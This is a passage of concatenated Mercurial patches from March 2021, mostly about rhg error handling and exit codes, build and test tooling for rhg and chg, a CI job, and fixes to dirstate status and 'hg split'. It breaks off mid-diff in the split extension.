Differential Revision: https://phab.mercurial-scm.org/D10141 diff --git a/rust/hg-core/src/config/layer.rs b/rust/hg-core/src/config/layer.rs --- a/rust/hg-core/src/config/layer.rs +++ b/rust/hg-core/src/config/layer.rs @@ -160,20 +160,28 @@ // `Path::join` with an absolute argument correctly ignores the // base path let filename = dir.join(&get_path_from_bytes(&filename_bytes)); - let data = std::fs::read(&filename).map_err(|io_error| { - ConfigParseError { - origin: ConfigOrigin::File(src.to_owned()), - line, - message: format_bytes!( - b"cannot include {} ({})", - filename_bytes, - format_bytes::Utf8(io_error) - ), + match std::fs::read(&filename) { + Ok(data) => { + layers.push(current_layer); + layers.extend(Self::parse(&filename, &data)?); + current_layer = + Self::new(ConfigOrigin::File(src.to_owned())); } - })?; - layers.push(current_layer); - layers.extend(Self::parse(&filename, &data)?); - current_layer = Self::new(ConfigOrigin::File(src.to_owned())); + Err(error) => { + if error.kind() != std::io::ErrorKind::NotFound { + return Err(ConfigParseError { + origin: ConfigOrigin::File(src.to_owned()), + line, + message: format_bytes!( + b"cannot include {} ({})", + filename_bytes, + format_bytes::Utf8(error) + ), + } + .into()); + } + } + } } else if let Some(_) = EMPTY_RE.captures(&bytes) { } else if let Some(m) = SECTION_RE.captures(&bytes) { section = m[1].to_vec(); # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1614786003 -3600 # Wed Mar 03 16:40:03 2021 +0100 # Node ID b1f2c2b336ec792d3e7eff18e059e9c850ddca03 # Parent 84a3deca963a727919d84ca3c1acfa675eecd7d1 rhg: `cat` command: print error messages for missing files And exit with an error code if no file was matched. This matches the behavior of Python-based hg. 
Differential Revision: https://phab.mercurial-scm.org/D10142 diff --git a/rust/hg-core/src/operations/cat.rs b/rust/hg-core/src/operations/cat.rs --- a/rust/hg-core/src/operations/cat.rs +++ b/rust/hg-core/src/operations/cat.rs @@ -17,30 +17,49 @@ use crate::utils::files::get_path_from_bytes; use crate::utils::hg_path::{HgPath, HgPathBuf}; +pub struct CatOutput { + /// Whether any file in the manifest matched the paths given as CLI + /// arguments + pub found_any: bool, + /// The contents of matching files, in manifest order + pub concatenated: Vec<u8>, + /// Which of the CLI arguments did not match any manifest file + pub missing: Vec<HgPathBuf>, + /// The node ID that the given revset was resolved to + pub node: Node, +} + const METADATA_DELIMITER: [u8; 2] = [b'\x01', b'\n']; -/// List files under Mercurial control at a given revision. +/// Output the given revision of files /// /// * `root`: Repository root /// * `rev`: The revision to cat the files from. /// * `files`: The files to output. 
-pub fn cat( +pub fn cat<'a>( repo: &Repo, revset: &str, - files: &[HgPathBuf], -) -> Result<Vec<u8>, RevlogError> { + files: &'a [HgPathBuf], +) -> Result<CatOutput, RevlogError> { let rev = crate::revset::resolve_single(revset, repo)?; let changelog = Changelog::open(repo)?; let manifest = Manifest::open(repo)?; let changelog_entry = changelog.get_rev(rev)?; + let node = *changelog + .node_from_rev(rev) + .expect("should succeed when changelog.get_rev did"); let manifest_node = Node::from_hex_for_repo(&changelog_entry.manifest_node()?)?; let manifest_entry = manifest.get_node(manifest_node.into())?; let mut bytes = vec![]; + let mut matched = vec![false; files.len()]; + let mut found_any = false; for (manifest_file, node_bytes) in manifest_entry.files_with_nodes() { - for cat_file in files.iter() { + for (cat_file, is_matched) in files.iter().zip(&mut matched) { if cat_file.as_bytes() == manifest_file.as_bytes() { + *is_matched = true; + found_any = true; let index_path = store_path(manifest_file, b".i"); let data_path = store_path(manifest_file, b".d"); @@ -65,7 +84,18 @@ } } - Ok(bytes) + let missing: Vec<_> = files + .iter() + .zip(&matched) + .filter(|pair| !*pair.1) + .map(|pair| pair.0.clone()) + .collect(); + Ok(CatOutput { + found_any, + concatenated: bytes, + missing, + node, + }) } fn store_path(hg_path: &HgPath, suffix: &[u8]) -> PathBuf { diff --git a/rust/hg-core/src/operations/mod.rs b/rust/hg-core/src/operations/mod.rs --- a/rust/hg-core/src/operations/mod.rs +++ b/rust/hg-core/src/operations/mod.rs @@ -6,7 +6,7 @@ mod debugdata; mod dirstate_status; mod list_tracked_files; -pub use cat::cat; +pub use cat::{cat, CatOutput}; pub use debugdata::{debug_data, DebugDataKind}; pub use list_tracked_files::Dirstate; pub use list_tracked_files::{list_rev_tracked_files, FilesForRev}; diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ 
-1,8 +1,8 @@ use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefix; use crate::revlog::Revision; +use crate::revlog::{Node, NodePrefix}; /// A specialized `Revlog` to work with `changelog` data format. pub struct Changelog { @@ -34,6 +34,10 @@ let bytes = self.revlog.get_rev_data(rev)?; Ok(ChangelogEntry { bytes }) } + + pub fn node_from_rev(&self, rev: Revision) -> Option<&Node> { + Some(self.revlog.index.get_entry(rev)?.hash()) + } } /// `Changelog` entry which knows how to interpret the `changelog` data bytes. diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -31,6 +31,9 @@ /// see also `NODES_BYTES_LENGTH` about it being private. const NODE_NYBBLES_LENGTH: usize = 2 * NODE_BYTES_LENGTH; +/// Default for UI presentation +const SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH: u8 = 12; + /// Private alias for readability and to ease future change type NodeData = [u8; NODE_BYTES_LENGTH]; @@ -164,6 +167,13 @@ pub fn as_bytes(&self) -> &[u8] { &self.data } + + pub fn short(&self) -> NodePrefix { + NodePrefix { + nybbles_len: SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH, + data: self.data, + } + } } /// The beginning of a binary revision SHA. diff --git a/rust/hg-core/src/revlog/revlog.rs b/rust/hg-core/src/revlog/revlog.rs --- a/rust/hg-core/src/revlog/revlog.rs +++ b/rust/hg-core/src/revlog/revlog.rs @@ -49,7 +49,7 @@ /// When index and data are not interleaved: bytes of the revlog index. /// When index and data are interleaved: bytes of the revlog index and /// data. 
- index: Index, + pub(crate) index: Index, /// When index and data are not interleaved: bytes of the revlog data data_bytes: Option<Box<dyn Deref<Target = [u8]> + Send>>, /// When present on disk: the persistent nodemap for this revlog diff --git a/rust/rhg/src/commands/cat.rs b/rust/rhg/src/commands/cat.rs --- a/rust/rhg/src/commands/cat.rs +++ b/rust/rhg/src/commands/cat.rs @@ -1,5 +1,6 @@ use crate::error::CommandError; use clap::Arg; +use format_bytes::format_bytes; use hg::operations::cat; use hg::utils::hg_path::HgPathBuf; use micro_timer::timed; @@ -58,9 +59,23 @@ match rev { Some(rev) => { - let data = cat(&repo, rev, &files).map_err(|e| (e, rev))?; - invocation.ui.write_stdout(&data)?; - Ok(()) + let output = cat(&repo, rev, &files).map_err(|e| (e, rev))?; + invocation.ui.write_stdout(&output.concatenated)?; + if !output.missing.is_empty() { + let short = format!("{:x}", output.node.short()).into_bytes(); + for path in &output.missing { + invocation.ui.write_stderr(&format_bytes!( + b"{}: no such file in rev {}\n", + path.as_bytes(), + short + ))?; + } + } + if output.found_any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) + } } None => Err(CommandError::unsupported( "`rhg cat` without `--rev` / `-r`", diff --git a/rust/rhg/src/error.rs b/rust/rhg/src/error.rs --- a/rust/rhg/src/error.rs +++ b/rust/rhg/src/error.rs @@ -15,6 +15,9 @@ /// Exit with an error message and "standard" failure exit code. Abort { message: Vec<u8> }, + /// Exit with a failure exit code but no message. + Unsuccessful, + /// Encountered something (such as a CLI argument, repository layout, …) /// not supported by this version of `rhg`. 
Depending on configuration /// `rhg` may attempt to silently fall back to Python-based `hg`, which diff --git a/rust/rhg/src/exitcode.rs b/rust/rhg/src/exitcode.rs --- a/rust/rhg/src/exitcode.rs +++ b/rust/rhg/src/exitcode.rs @@ -6,5 +6,8 @@ /// Generic abort pub const ABORT: ExitCode = 255; +/// Generic something completed but did not succeed +pub const UNSUCCESSFUL: ExitCode = 1; + /// Command or feature not implemented by rhg pub const UNIMPLEMENTED: ExitCode = 252; diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -186,6 +186,7 @@ match result { Ok(()) => exitcode::OK, Err(CommandError::Abort { .. }) => exitcode::ABORT, + Err(CommandError::Unsuccessful) => exitcode::UNSUCCESSFUL, // Exit with a specific code and no error message to let a potential // wrapper script fallback to Python-based Mercurial. @@ -242,6 +243,7 @@ } match &result { Ok(_) => {} + Err(CommandError::Unsuccessful) => {} Err(CommandError::Abort { message }) => { if !message.is_empty() { // Ignore errors when writing to stderr, we’re already exiting # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615227933 -3600 # Mon Mar 08 19:25:33 2021 +0100 # Node ID 63bfcddddac1d6f361ca012e31a6005793c714c6 # Parent b1f2c2b336ec792d3e7eff18e059e9c850ddca03 rhg: Exit with an error code if `files` finds nothing This matches the behavior of Python-based hg. 
Differential Revision: https://phab.mercurial-scm.org/D10143 diff --git a/rust/rhg/src/commands/files.rs b/rust/rhg/src/commands/files.rs --- a/rust/rhg/src/commands/files.rs +++ b/rust/rhg/src/commands/files.rs @@ -61,11 +61,17 @@ let mut stdout = ui.stdout_buffer(); + let mut any = false; for file in files { + any = true; let file = working_directory.join(file); stdout.write_all(relativize_path(&file, &cwd).as_ref())?; stdout.write_all(b"\n")?; } stdout.flush()?; - Ok(()) + if any { + Ok(()) + } else { + Err(CommandError::Unsuccessful) + } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615230260 -3600 # Mon Mar 08 20:04:20 2021 +0100 # Node ID eb14264b98e8dcdc3bd259a5aa5fa3cd934d46e7 # Parent 63bfcddddac1d6f361ca012e31a6005793c714c6 rhg: Fall back to Python for --version Clap has some built-in support for printing something on --version, but it looks different than what Python-based hg does. Also, at the moment we’re not giving version numbers to rhg separate from the Mercurial version. Differential Revision: https://phab.mercurial-scm.org/D10144 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -29,6 +29,7 @@ let app = App::new("rhg") .global_setting(AppSettings::AllowInvalidUtf8) + .global_setting(AppSettings::DisableVersion) .setting(AppSettings::SubcommandRequired) .setting(AppSettings::VersionlessSubcommands) .arg( # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615277844 -3600 # Tue Mar 09 09:17:24 2021 +0100 # Node ID b1e6265e8336563bb3f4fdb77a82b5b6dd61679b # Parent eb14264b98e8dcdc3bd259a5aa5fa3cd934d46e7 rhg: Return an error code for `rhg config Section.idontexist` This is what Python-based hg does. 
Differential Revision: https://phab.mercurial-scm.org/D10145 diff --git a/rust/rhg/src/commands/config.rs b/rust/rhg/src/commands/config.rs --- a/rust/rhg/src/commands/config.rs +++ b/rust/rhg/src/commands/config.rs @@ -29,8 +29,10 @@ .split_2(b'.') .ok_or_else(|| HgError::unsupported("hg config <section>"))?; - let value = invocation.config.get(section, name).unwrap_or(b""); - - invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; - Ok(()) + if let Some(value) = invocation.config.get(section, name) { + invocation.ui.write_stdout(&format_bytes!(b"{}\n", value))?; + Ok(()) + } else { + Err(CommandError::Unsuccessful) + } } # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615581847 -3600 # Fri Mar 12 21:44:07 2021 +0100 # Node ID bde90e9b4507a96916d50772d3bf1aec3121c1fd # Parent b1e6265e8336563bb3f4fdb77a82b5b6dd61679b rhg: Remove `rhg.fallback-executable=hg` default configuration When `rhg.on-unsupported` is configured to `fallback` and an unsupported feature is encountered, the previous default was to look for an `hg` executable in `$PATH`. This default was fragile since it was easy to end up accidentally using an older version of Mercurial installed system-wide, when a local (perhaps patched) installation was intended. Instead, it is now an error to have `rhg.on-unsupported=fallback` without also configuring an explicit path or the fallback executable. 
Differential Revision: https://phab.mercurial-scm.org/D10189 diff --git a/rust/rhg/src/main.rs b/rust/rhg/src/main.rs --- a/rust/rhg/src/main.rs +++ b/rust/rhg/src/main.rs @@ -138,7 +138,7 @@ exit( &initial_current_dir, &ui, - OnUnsupported::from_config(&non_repo_config), + OnUnsupported::from_config(&ui, &non_repo_config), Err(CommandError::UnsupportedFeature { message: format_bytes!( b"URL-like --repository {}", @@ -158,7 +158,7 @@ Err(error) => exit( &initial_current_dir, &ui, - OnUnsupported::from_config(&non_repo_config), + OnUnsupported::from_config(&ui, &non_repo_config), Err(error.into()), ), }; @@ -168,6 +168,7 @@ } else { &non_repo_config }; + let on_unsupported = OnUnsupported::from_config(&ui, config); let result = main_with_result( &process_start_time, @@ -175,12 +176,7 @@ repo_result.as_ref(), config, ); - exit( - &initial_current_dir, - &ui, - OnUnsupported::from_config(config), - result, - ) + exit(&initial_current_dir, &ui, on_unsupported, result) } fn exit_code(result: &Result<(), CommandError>) -> i32 { @@ -242,6 +238,14 @@ } } } + exit_no_fallback(ui, on_unsupported, result) +} + +fn exit_no_fallback( + ui: &Ui, + on_unsupported: OnUnsupported, + result: Result<(), CommandError>, +) -> ! { match &result { Ok(_) => {} Err(CommandError::Unsuccessful) => {} @@ -387,9 +391,8 @@ impl OnUnsupported { const DEFAULT: Self = OnUnsupported::Abort; - const DEFAULT_FALLBACK_EXECUTABLE: &'static [u8] = b"hg"; - fn from_config(config: &Config) -> Self { + fn from_config(ui: &Ui, config: &Config) -> Self { match config .get(b"rhg", b"on-unsupported") .map(|value| value.to_ascii_lowercase()) @@ -400,7 +403,16 @@ Some(b"fallback") => OnUnsupported::Fallback { executable: config .get(b"rhg", b"fallback-executable") - .unwrap_or(Self::DEFAULT_FALLBACK_EXECUTABLE) + .unwrap_or_else(|| { + exit_no_fallback( + ui, + Self::Abort, + Err(CommandError::abort( + "abort: 'rhg.on-unsupported=fallback' without \ + 'rhg.fallback-executable' set." 
+ )), + ) + }) .to_owned(), }, None => Self::DEFAULT, diff --git a/tests/test-rhg.t b/tests/test-rhg.t --- a/tests/test-rhg.t +++ b/tests/test-rhg.t @@ -150,6 +150,14 @@ $ rhg cat original original content + $ FALLBACK_EXE="$RHG_FALLBACK_EXECUTABLE" + $ unset RHG_FALLBACK_EXECUTABLE + $ rhg cat original + abort: 'rhg.on-unsupported=fallback' without 'rhg.fallback-executable' set. + [255] + $ RHG_FALLBACK_EXECUTABLE="$FALLBACK_EXE" + $ export RHG_FALLBACK_EXECUTABLE + $ rhg cat original --config rhg.fallback-executable=false [1] # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615586696 -3600 # Fri Mar 12 23:04:56 2021 +0100 # Node ID 5a2212d403980bee71e7f2b0d4784099ca7c2f82 # Parent bde90e9b4507a96916d50772d3bf1aec3121c1fd tests: Disable for rhg remaining tests that fail in that mode These cases are in features not yet implemented by rhg for which triggering a fallback is not practical. Disabling some tests allows us to reach passing CI and catch any future regression in the rest of the tests. 
Differential Revision: https://phab.mercurial-scm.org/D10190 diff --git a/tests/test-config.t b/tests/test-config.t --- a/tests/test-config.t +++ b/tests/test-config.t @@ -3,6 +3,8 @@ Invalid syntax: no value +TODO: add rhg support for detailed exit codes +#if no-rhg $ cat > .hg/hgrc << EOF > novaluekey > EOF @@ -35,6 +37,7 @@ $ hg showconfig config error at $TESTTMP/.hg/hgrc:1: unexpected leading whitespace: [section] [30] +#endif Reset hgrc diff --git a/tests/test-debugcommands.t b/tests/test-debugcommands.t --- a/tests/test-debugcommands.t +++ b/tests/test-debugcommands.t @@ -531,9 +531,17 @@ Test WdirUnsupported exception +#if no-rhg $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff abort: working directory revision cannot be specified [255] +#else +TODO: add rhg support for (at least parsing) the working directory pseudo-changeset + $ hg debugdata -c ffffffffffffffffffffffffffffffffffffffff + abort: working directory revision cannot be specified (missing-correct-output !) + abort: invalid revision identifier: ffffffffffffffffffffffffffffffffffffffff (known-bad-output !) + [255] +#endif Test cache warming command diff --git a/tests/test-dispatch.t b/tests/test-dispatch.t --- a/tests/test-dispatch.t +++ b/tests/test-dispatch.t @@ -90,9 +90,12 @@ $ mkdir -p badrepo/.hg $ echo 'invalid-syntax' > badrepo/.hg/hgrc +TODO: add rhg support for detailed exit codes +#if no-rhg $ hg log -b -Rbadrepo default config error at badrepo/.hg/hgrc:1: invalid-syntax [30] +#endif $ hg log -b --cwd=inexistent default abort: $ENOENT$: 'inexistent' diff --git a/tests/test-globalopts.t b/tests/test-globalopts.t --- a/tests/test-globalopts.t +++ b/tests/test-globalopts.t @@ -65,6 +65,8 @@ -R with path aliases: +TODO: add rhg support for path aliases +#if no-rhg $ cd c $ hg -R default identify 8580ff50825a tip @@ -75,6 +77,7 @@ $ HOME=`pwd`/../ hg -R relativetohome identify 8580ff50825a tip $ cd .. 
+#endif #if no-outer-repo @@ -215,6 +218,8 @@ $ hg --cwd c --config paths.quuxfoo=bar paths | grep quuxfoo > /dev/null && echo quuxfoo quuxfoo +TODO: add rhg support for detailed exit codes +#if no-rhg $ hg --cwd c --config '' tip -q abort: malformed --config option: '' (use --config section.name=value) [10] @@ -230,6 +235,7 @@ $ hg --cwd c --config .b= tip -q abort: malformed --config option: '.b=' (use --config section.name=value) [10] +#endif Testing --debug: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380811 -3600 # Wed Mar 10 13:53:31 2021 +0100 # Node ID 350e7f051e954f3092afb0d31a680c7674b44efa # Parent 5a2212d403980bee71e7f2b0d4784099ca7c2f82 makefile: add a build-chg option This is done as a gratuitous improvement on the way to add makefile entry to build and install rhg. It seems saner to have equivalent entry for chg too. Differential Revision: https://phab.mercurial-scm.org/D10191 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -68,6 +68,9 @@ build: $(PYTHON) setup.py $(PURE) build $(COMPILERFLAG) +build-chg: + make -C contrib/chg + wheel: FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380827 -3600 # Wed Mar 10 13:53:47 2021 +0100 # Node ID a7204958ca21e8ee5bc63bd2445e04f7c84065f8 # Parent 350e7f051e954f3092afb0d31a680c7674b44efa makefile: add a install-chg option This is done as a gratuitous improvement on the way to add makefile entry to build and install rhg. It seems saner to have equivalent entry for chg too. 
Differential Revision: https://phab.mercurial-scm.org/D10192 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -99,6 +99,9 @@ install-bin: build $(PYTHON) setup.py $(PURE) install --root="$(DESTDIR)/" --prefix="$(PREFIX)" --force +install-chg: build-chg + make -C contrib/chg install PREFIX="$(PREFIX)" + install-doc: doc cd doc && $(MAKE) $(MFLAGS) install # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380840 -3600 # Wed Mar 10 13:54:00 2021 +0100 # Node ID a20674f2055c2a84f97e5302415e84a6382b8871 # Parent a7204958ca21e8ee5bc63bd2445e04f7c84065f8 makefile: add a build-rhg option This gives an easy action to build the rhg-binary. This will be useful for the `install-rhg` action in the next changeset. Differential Revision: https://phab.mercurial-scm.org/D10193 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -71,6 +71,9 @@ build-chg: make -C contrib/chg +build-rhg: + (cd rust/rhg; cargo build --release) + wheel: FORCE_SETUPTOOLS=1 $(PYTHON) setup.py $(PURE) bdist_wheel $(COMPILERFLAG) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380853 -3600 # Wed Mar 10 13:54:13 2021 +0100 # Node ID 99c0b03894ee470aaf2e718fad1d42a5003a9282 # Parent a20674f2055c2a84f97e5302415e84a6382b8871 makefile: add an install option This gives an easy way to install rhg that we can use in `run-test.py` in the next changesets. 
Differential Revision: https://phab.mercurial-scm.org/D10194 diff --git a/Makefile b/Makefile --- a/Makefile +++ b/Makefile @@ -116,6 +116,9 @@ install-home-doc: doc cd doc && $(MAKE) $(MFLAGS) PREFIX="$(HOME)" install +install-rhg: build-rhg + install -m 755 rust/target/release/rhg "$(PREFIX)"/bin/ + MANIFEST-doc: $(MAKE) -C doc MANIFEST # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1615380886 -3600 # Wed Mar 10 13:54:46 2021 +0100 # Node ID 9ba00a9dc6eaa6518d45f483e95c9c269e205441 # Parent 99c0b03894ee470aaf2e718fad1d42a5003a9282 run-test: install rhg if --rhg is passed Before this, --rhg was only working with --local. Differential Revision: https://phab.mercurial-scm.org/D10195 diff --git a/tests/run-tests.py b/tests/run-tests.py --- a/tests/run-tests.py +++ b/tests/run-tests.py @@ -3389,6 +3389,9 @@ if self.options.chg: assert self._installdir self._installchg() + if self.options.rhg: + assert self._installdir + self._installrhg() log( 'running %d tests using %d parallel processes' @@ -3750,6 +3753,33 @@ sys.stdout.write(out) sys.exit(1) + def _installrhg(self): + """Install rhg into the test environment""" + vlog('# Performing temporary installation of rhg') + assert os.path.dirname(self._bindir) == self._installdir + assert self._hgroot, 'must be called after _installhg()' + cmd = b'"%(make)s" install-rhg PREFIX="%(prefix)s"' % { + b'make': b'make', # TODO: switch by option or environment? 
+ b'prefix': self._installdir, + } + cwd = self._hgroot + vlog("# Running", cmd) + proc = subprocess.Popen( + cmd, + shell=True, + cwd=cwd, + stdin=subprocess.PIPE, + stdout=subprocess.PIPE, + stderr=subprocess.STDOUT, + ) + out, _err = proc.communicate() + if proc.returncode != 0: + if PYTHON3: + sys.stdout.buffer.write(out) + else: + sys.stdout.write(out) + sys.exit(1) + def _outputcoverage(self): """Produce code coverage output.""" import coverage # HG changeset patch # User Simon Sapin <simon.sapin@octobus.net> # Date 1615233891 -3600 # Mon Mar 08 21:04:51 2021 +0100 # Node ID 6b57144792881bb9cda37d43c59d2b8001177981 # Parent 9ba00a9dc6eaa6518d45f483e95c9c269e205441 ci: Add a job testing with rhg installed as `hg` This significantly increases test coverage of rhg, without duplicating many tests that already exist. The `cargo build` command being remove only compiled a `rhg` executable (as shown by the preceding `cd` command) but since a previous patch `run-tests.py --rhg` now takes care of that. Differential Revision: https://phab.mercurial-scm.org/D10196 diff --git a/contrib/heptapod-ci.yml b/contrib/heptapod-ci.yml --- a/contrib/heptapod-ci.yml +++ b/contrib/heptapod-ci.yml @@ -26,17 +26,6 @@ - echo "$RUNTEST_ARGS" - HGTESTS_ALLOW_NETIO="$TEST_HGTESTS_ALLOW_NETIO" HGMODULEPOLICY="$TEST_HGMODULEPOLICY" "$PYTHON" tests/run-tests.py --color=always $RUNTEST_ARGS - -.rust_template: &rust - before_script: - - hg clone . /tmp/mercurial-ci/ --noupdate --config phases.publish=no - - hg -R /tmp/mercurial-ci/ update `hg log --rev '.' 
--template '{node}'` - - ls -1 tests/test-check-*.* > /tmp/check-tests.txt - - cd /tmp/mercurial-ci/rust/rhg - - cargo build --release - - cd /tmp/mercurial-ci/ - - checks-py2: <<: *runtests variables: @@ -95,7 +84,6 @@ test-py2-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" @@ -103,13 +91,20 @@ test-py3-rust: <<: *runtests - <<: *rust variables: HGWITHRUSTEXT: cpython RUNTEST_ARGS: "--rust --blacklist /tmp/check-tests.txt" PYTHON: python3 TEST_HGMODULEPOLICY: "rust+c" +test-py3-rhg: + <<: *runtests + variables: + HGWITHRUSTEXT: cpython + RUNTEST_ARGS: "--rust --rhg --blacklist /tmp/check-tests.txt" + PYTHON: python3 + TEST_HGMODULEPOLICY: "rust+c" + test-py2-chg: <<: *runtests variables: # HG changeset patch # User Joerg Sonnenberger <joerg@bec.de> # Date 1615849632 -3600 # Tue Mar 16 00:07:12 2021 +0100 # Node ID c5912e35d06dc5d40769bb3b929fe93ba823b8aa # Parent 6b57144792881bb9cda37d43c59d2b8001177981 README: document requirement for builtin zstd Differential Revision: https://phab.mercurial-scm.org/D10226 diff --git a/README.rst b/README.rst --- a/README.rst +++ b/README.rst @@ -18,3 +18,13 @@ See https://mercurial-scm.org/ for detailed installation instructions, platform-specific notes, and Mercurial user information. + +Notes for packagers +=================== + +Mercurial ships a copy of the python-zstandard sources. This is used to +provide support for zstd compression and decompression functionality. The +module is not intended to be replaced by the plain python-zstandard nor +is it intended to use a system zstd library. Patches can result in hard +to diagnose errors and are explicitly discouraged as unsupported +configuration. 
# HG changeset patch # User Raphaël Gomès <rgomes@octobus.net> # Date 1615809900 -3600 # Mon Mar 15 13:05:00 2021 +0100 # Node ID 3c9ddb1986a9812507364a828877ce23bc17b535 # Parent c5912e35d06dc5d40769bb3b929fe93ba823b8aa rust-status: fix issue6456 for the Rust implementation also This implementation is being used by a few people now, so we need it fixed, even though a big rewrite will be coming quite soon. Differential Revision: https://phab.mercurial-scm.org/D10217 diff --git a/rust/hg-core/src/dirstate/status.rs b/rust/hg-core/src/dirstate/status.rs --- a/rust/hg-core/src/dirstate/status.rs +++ b/rust/hg-core/src/dirstate/status.rs @@ -184,7 +184,13 @@ || other_parent || copy_map.contains_key(filename.as_ref()) { - Dispatch::Modified + if metadata.is_symlink() && size_changed { + // issue6456: Size returned may be longer due to encryption + // on EXT-4 fscrypt. TODO maybe only do it on EXT4? + Dispatch::Unsure + } else { + Dispatch::Modified + } } else if mod_compare(mtime, st_mtime as i32) || st_mtime == options.last_normal_time { diff --git a/rust/hg-core/src/utils/files.rs b/rust/hg-core/src/utils/files.rs --- a/rust/hg-core/src/utils/files.rs +++ b/rust/hg-core/src/utils/files.rs @@ -199,6 +199,12 @@ st_ctime: metadata.ctime(), } } + + pub fn is_symlink(&self) -> bool { + // This is way too manual, but `HgMetadata` will go away in the + // near-future dirstate rewrite anyway. + self.st_mode & 0170000 == 0120000 + } } /// Returns the canonical path of `name`, given `cwd` and `root` # HG changeset patch # User Martin von Zweigbergk <martinvonz@google.com> # Date 1615569340 28800 # Fri Mar 12 09:15:40 2021 -0800 # Node ID 7f6c002d7c0ad34e7b4774c771e60525a9e84f4c # Parent 3c9ddb1986a9812507364a828877ce23bc17b535 split: close transaction in the unlikely event of a conflict while rebasing `hg split` *should* never result in conflicts, but in case there are bugs, we should at least commit the transaction so they can continue the rebase. 
One of our users ran into the regression fixed by D10120. They fixed the conflict and the tried to continue the rebase, but it failed with "abort: cannot continue inconsistent rebase" because the rebase state referred to commits written in a transaction that was never committed. Side note: `hg split` should probably turn off copy tracing to reduce the impact of such bugs, and to speed it up as well. Copies made in the rebased commits should still be respected because `hg rebase` calls `copies.graftcopies()`. Differential Revision: https://phab.mercurial-scm.org/D10164 diff --git a/hgext/split.py b/hgext/split.py --- a/hgext/split.py +++ b/hgext/split.py @@ -27,6 +27,7 @@ revsetlang, rewriteutil, scmutil, + util, ) # allow people to use split without explicitly enabling rebase extension @@ -69,57 +70,62 @@ if opts.get(b'rev'): revlist.append(opts.get(b'rev')) revlist.extend(revs) - with repo.wlock(), repo.lock(), repo.transaction(b'split') as tr: - revs = scmutil.revrange(repo, revlist or [b'.']) - if len(revs) > 1: - raise error.InputError(_(b'cannot split multiple revisions')) + with repo.wlock(), repo.lock(): + tr = repo.transaction(b'split') + # If the rebase somehow runs into conflicts, make sure + # we close the transaction so the user can continue it. + with util.acceptintervention(tr): + revs = scmutil.revrange(repo, revlist or [b'.']) + if len(revs) > 1: + raise error.InputError(_(b'cannot split multiple revisions')) - rev = revs.first() - ctx = repo[rev] - # Handle nullid specially here (instead of leaving for precheck() - # below) so we get a nicer message and error code. - if rev is None or ctx.node() == nullid: - ui.status(_(b'nothing to split\n')) - return 1 - if ctx.node() is None: - raise error.InputError(_(b'cannot split working directory')) + rev = revs.first() + ctx = repo[rev] + # Handle nullid specially here (instead of leaving for precheck() + # below) so we get a nicer message and error code. 
+ if rev is None or ctx.node() == nullid: + ui.status(_(b'nothing to split\n')) + return 1 + if ctx.node() is None: + raise error.InputError(_(b'cannot split working directory')) - if opts.get(b'rebase'): - # Skip obsoleted descendants and their descendants so the rebase - # won't cause conflicts for sure. - descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) - torebase = list( - repo.revs( - b'%ld - (%ld & obsolete())::', descendants, descendants + if opts.get(b'rebase'): + # Skip obsoleted descendants and their descendants so the rebase + # won't cause conflicts for sure. + descendants = list(repo.revs(b'(%d::) - (%d)', rev, rev)) + torebase = list( + repo.revs( + b'%ld - (%ld & obsolete())::', descendants, descendants + ) ) - ) - else: - torebase = [] - rewriteutil.precheck(repo, [rev] + torebase, b'split') + else: + torebase = [] + rewriteutil.precheck(repo, [rev] + torebase, b'split') - if len(ctx.parents()) > 1: - raise error.InputError(_(b'cannot split a merge changeset')) + if len(ctx.parents()) > 1: + raise error.InputError(_(b'cannot split a merge changeset')) - cmdutil.bailifchanged(repo) + cmdutil.bailifchanged(repo) - # Deactivate bookmark temporarily so it won't get moved unintentionally - bname = repo._activebookmark - if bname and repo._bookmarks[bname] != ctx.node(): - bookmarks.deactivate(repo) + # Deactivate bookmark temporarily so it won't get moved + # unintentionally + bname = repo._activebookmark + if bname and repo._bookmarks[bname] != ctx.node(): + bookmarks.deactivate(repo) - wnode = repo[b'.'].node() - top = None - try: - top = dosplit(ui, repo, tr, ctx, opts) - finally: - # top is None: split failed, need update --clean recovery. - # wnode == ctx.node(): wnode split, no need to update. 
